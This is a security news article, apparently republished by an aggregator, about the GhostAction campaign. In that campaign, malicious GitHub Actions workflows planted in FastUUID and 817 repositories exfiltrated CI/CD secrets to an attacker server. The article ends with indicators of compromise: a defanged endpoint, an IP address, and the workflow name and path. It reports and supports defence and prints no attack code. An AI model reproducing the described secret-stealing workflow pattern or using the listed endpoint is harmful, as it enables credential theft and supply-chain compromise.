Divya
2025-09-08 01:28:00
gbhackers.com
Security researchers uncovered a large-scale attack campaign now identified as GhostAction, which compromised secrets belonging to 327 GitHub users and impacted 817 repositories.
The incident began with the discovery of a malicious workflow embedded in the widely used FastUUID project.
The attack was first spotted when GitGuardian detected a suspicious GitHub workflow commit titled “Add Github Actions Security workflow” pushed by the account Grommash9 on September 2, 2025.
This workflow was designed to steal sensitive secrets, such as API tokens, by transmitting them to an attacker-controlled server.
FastUUID as the Entry Point
The injected malicious file extracted the PyPI API token from the repository’s environment variables, then exfiltrated it to an external server.
While the token could have been used to tamper with the FastUUID package on PyPI, researchers confirmed no evidence of malicious releases during the compromise window.
GitGuardian immediately raised an alert issue and reported the matter to PyPI. Within hours, PyPI placed the project in read-only mode, and the compromised maintainer rolled back the malicious commit.
Because of this swift response, the impact on FastUUID and its dependent projects, like BerriAI/litellm, appears minimal.
However, further investigation revealed that FastUUID was not the sole target. Identical malicious commits were detected across multiple repositories, both public and private.
Researchers linked the attack to a broader campaign affecting hundreds of projects. Each commit deployed similar workflows that attempted to exfiltrate a variety of secrets, including GitHub tokens, DockerHub credentials, Cloudflare API tokens, and NPM access keys.
In total, GitGuardian identified 3,325 leaked secrets across the campaign. The compromised NPM and PyPI tokens pose a significant supply chain security risk, as they could allow attackers to publish malicious packages under trusted names.
The malicious workflows consistently sent stolen data to the server at hxxps://bold-dhawan.45-139-104-115.plesk.page, which resolved to an IP hosted under 493networking.cc.
This infrastructure stopped responding by the evening of September 5, suggesting the attacker may have shut it down after discovery.
Of the 817 repositories impacted, 100 reverted the changes quickly, while GitGuardian was able to warn maintainers in another 573 projects.
Some repositories, however, had already been deleted or had issues disabled, limiting the ability to notify owners.
Initial reports from affected developers confirm that the stolen secrets were actively exploited, including unauthorized use of AWS keys and database credentials.
Several companies had entire software portfolios compromised, spanning languages such as Python, Rust, JavaScript, and Go.
GitGuardian disclosed the full findings to GitHub, PyPI, and NPM on September 5. As of now, 9 NPM packages and 15 PyPI projects remain at potential risk if their compromised tokens are leveraged to publish malicious updates.
The GhostAction campaign stands as one of the largest developer ecosystem compromises in recent years, highlighting the importance of monitoring workflows, securing CI/CD secrets, and maintaining rapid incident response.
Indicators of Compromise (IOCs)
Network Indicators
- Malicious Endpoint: hxxps://bold-dhawan.45-139-104-115.plesk.page
- IP Address: 45.139.104.115
- HTTP Method: POST requests with secret data
GitHub Workflow Indicators
- Malicious Workflow Name: Github Actions Security
- File Path: .github/workflows/github_actions_security.yml
- Commit Messages: “Add Github Actions Security workflow”
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
Keep your files stored safely and securely with the SanDisk 2TB Extreme Portable SSD. With over 69,505 ratings and an impressive 4.6 out of 5 stars, this product has been purchased over 8K+ times in the past month. At only $129.99, this Amazon’s Choice product is a must-have for secure file storage.
Help keep private content private with the included password protection featuring 256-bit AES hardware encryption. Order now for just $129.99 on Amazon!
Help Power Techcratic’s Future – Scan To Support
If Techcratic’s content and insights have helped you, consider giving back by supporting the platform with crypto. Every contribution makes a difference, whether it’s for high-quality content, server maintenance, or future updates. Techcratic is constantly evolving, and your support helps drive that progress.
As a solo operator who wears all the hats, creating content, managing the tech, and running the site, your support allows me to stay focused on delivering valuable resources. Your support keeps everything running smoothly and enables me to continue creating the content you love. I’m deeply grateful for your support, it truly means the world to me! Thank you!
|
BITCOIN
bc1qlszw7elx2qahjwvaryh0tkgg8y68enw30gpvge Scan the QR code with your crypto wallet app |
|
DOGECOIN
D64GwvvYQxFXYyan3oQCrmWfidf6T3JpBA Scan the QR code with your crypto wallet app |
|
ETHEREUM
0xe9BC980DF3d985730dA827996B43E4A62CCBAA7a Scan the QR code with your crypto wallet app |
Please read the Privacy and Security Disclaimer on how Techcratic handles your support.
Disclaimer: As an Amazon Associate, Techcratic may earn from qualifying purchases.
